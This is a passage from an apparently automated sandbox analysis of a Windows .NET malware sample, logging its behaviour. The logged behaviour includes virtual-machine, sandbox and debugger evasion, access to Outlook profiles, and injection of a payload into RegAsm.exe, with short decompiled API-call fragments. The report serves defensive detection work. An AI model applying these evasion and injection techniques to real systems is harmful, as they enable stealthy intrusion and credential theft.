                    Source: C:\Users\user\Desktop\450230549.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: vaultcli.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
                    Source: 450230549.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: 450230549.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: 450230549.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                    Source: Binary string: HSDSDF32.pdb( source: 450230549.exe
                    Source: Binary string: HSDSDF32.pdb source: 450230549.exe

                    Data Obfuscation

                    barindex
                    .NET source code contains method to dynamically call methods (often used by packers)
                    Source: 450230549.exe, DyyVDbaRvM1YfIq9il.cs.Net Code: Type.GetTypeFromHandle(KKr6hZkjvwWjdm9A4Z.IRRpZ0UGCKAgx(16777255)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(KKr6hZkjvwWjdm9A4Z.IRRpZ0UGCKAgx(16777256)),Type.GetTypeFromHandle(KKr6hZkjvwWjdm9A4Z.IRRpZ0UGCKAgx(16777253))})
                    Source: 450230549.exeStatic PE information: 0xA449B1F0 [Sat May 5 12:58:24 2057 UTC]
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00EAAEB8 push esp; iretd 3_2_00EAB1FD
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_060F9672 push es; ret 3_2_060F968C
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_060F7782 push es; ret 3_2_060F7790
                    Source: 450230549.exe, DyyVDbaRvM1YfIq9il.csHigh entropy of concatenated method names: 'D4r4O0AxSI', 'OadpZ0AU6PEEW', 'creoiNvd7', 'jZiU8kt7k', 'yIEeUuogE', 'HNMMnrD0K', 'U6ZIpjiMV', 'TYIaeXNeW', 'rI3lmZ9FL', 'SuhhReBcy'
                    Source: 450230549.exe, R2mIapWar4cwoqqx6Q.csHigh entropy of concatenated method names: 'IWZ4FNxMCV', 'X4o4BaXNNW', 'ReR4PkWY9i', 'XZO4yOqtpA', 'pcT48wm9UY', 'Y9l4jroko9', 'OY84tBcMwd', 'JrQ4qkE5mX', 'iRM4R10ean', 'AGe45CEX5X'

                    Hooking and other Techniques for Hiding and Protection

                    barindex
                    Icon mismatch, binary includes an icon from a different legit application in order to fool users
                    Source: initial sampleIcon embedded in binary file: icon matches a legit application icon: download (92).png
                    Source: C:\Users\user\Desktop\450230549.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\450230549.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\450230549.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\450230549.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\450230549.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\450230549.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\450230549.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\450230549.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\450230549.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\450230549.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\450230549.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\450230549.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\450230549.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\450230549.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\450230549.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\450230549.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\450230549.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\450230549.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\450230549.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\450230549.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\450230549.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\450230549.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\450230549.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\450230549.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\450230549.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\450230549.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\450230549.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\450230549.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\450230549.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\450230549.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\450230549.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\450230549.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\450230549.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\450230549.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\450230549.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\450230549.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\450230549.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\450230549.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\450230549.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\450230549.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\450230549.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\450230549.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\450230549.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\450230549.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\450230549.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    barindex
                    Yara detected AntiVM3
                    Source: Yara matchFile source: Process Memory Space: 450230549.exe PID: 7068, type: MEMORYSTR
                    Check if machine is in data center or colocation facility
                    Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                    Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                    Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                    Source: 450230549.exe, 00000000.00000002.1726211238.0000000003709000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.3558791115.00000000028D5000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.3557540735.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                    Source: C:\Users\user\Desktop\450230549.exeMemory allocated: D30000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\450230549.exeMemory allocated: 2700000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\450230549.exeMemory allocated: 4700000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: EA0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 28A0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 26A0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\450230549.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 5903375Jump to behavior
                    Source: C:\Users\user\Desktop\450230549.exe TID: 6220Thread sleep count: 188 > 30Jump to behavior
                    Source: C:\Users\user\Desktop\450230549.exe TID: 6220Thread sleep count: 286 > 30Jump to behavior
                    Source: C:\Users\user\Desktop\450230549.exe TID: 7116Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 4348Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 4348Thread sleep time: -100000s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5868Thread sleep count: 200 > 30Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 4348Thread sleep time: -5903375s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\450230549.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 100000Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 5903375Jump to behavior
                    Source: RegAsm.exe, 00000003.00000002.3558791115.00000000028D5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware
                    Source: RegAsm.exe, 00000003.00000002.3557540735.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: vmware
                    Source: RegAsm.exe, 00000003.00000002.3561320384.0000000005AF0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllS
                    Source: RegAsm.exe, 00000003.00000002.3557540735.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: VMwareVBoxESelect * from Win32_ComputerSystem
                    Source: 450230549.exe, 00000000.00000002.1722663773.0000000000A47000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: C:\Users\user\Desktop\450230549.exeProcess information queried: ProcessInformationJump to behavior

                    Anti Debugging

                    barindex
                    Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00EA71D0 CheckRemoteDebuggerPresent,3_2_00EA71D0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\Desktop\450230549.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\450230549.exeMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    .NET source code references suspicious native API functions
                    Source: 450230549.exe, Program.csReference to suspicious API methods: App.ReadProcessMemory(Settings.pi.ProcessHandle, num3 + 8, ref buffer, 4, ref bytesRead)
                    Source: 450230549.exe, Program.csReference to suspicious API methods: App.VirtualAllocEx(Settings.pi.ProcessHandle, num2, length, 12288, 64)
                    Source: 450230549.exe, Program.csReference to suspicious API methods: App.WriteProcessMemory(Settings.pi.ProcessHandle, num4, payload, bufferSize, ref bytesRead)
                    Source: 0.2.450230549.exe.385caa0.1.raw.unpack, G0uwH3C1Dp.csReference to suspicious API methods: Yb0w.OpenProcess(bTplrq.DuplicateHandle, bInheritHandle: true, (uint)qDR7wr.ProcessID)
                    Allocates memory in foreign processes
                    Source: C:\Users\user\Desktop\450230549.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and writeJump to behavior
                    Injects a PE file into a foreign processes
                    Source: C:\Users\user\Desktop\450230549.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5AJump to behavior
                    Writes to foreign memory regions
                    Source: C:\Users\user\Desktop\450230549.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000Jump to behavior
                    Source: C:\Users\user\Desktop\450230549.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 402000Jump to behavior
                    Source: C:\Users\user\Desktop\450230549.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 43E000Jump to behavior
                    Source: C:\Users\user\Desktop\450230549.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 440000Jump to behavior
                    Source: C:\Users\user\Desktop\450230549.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 6FC008Jump to behavior
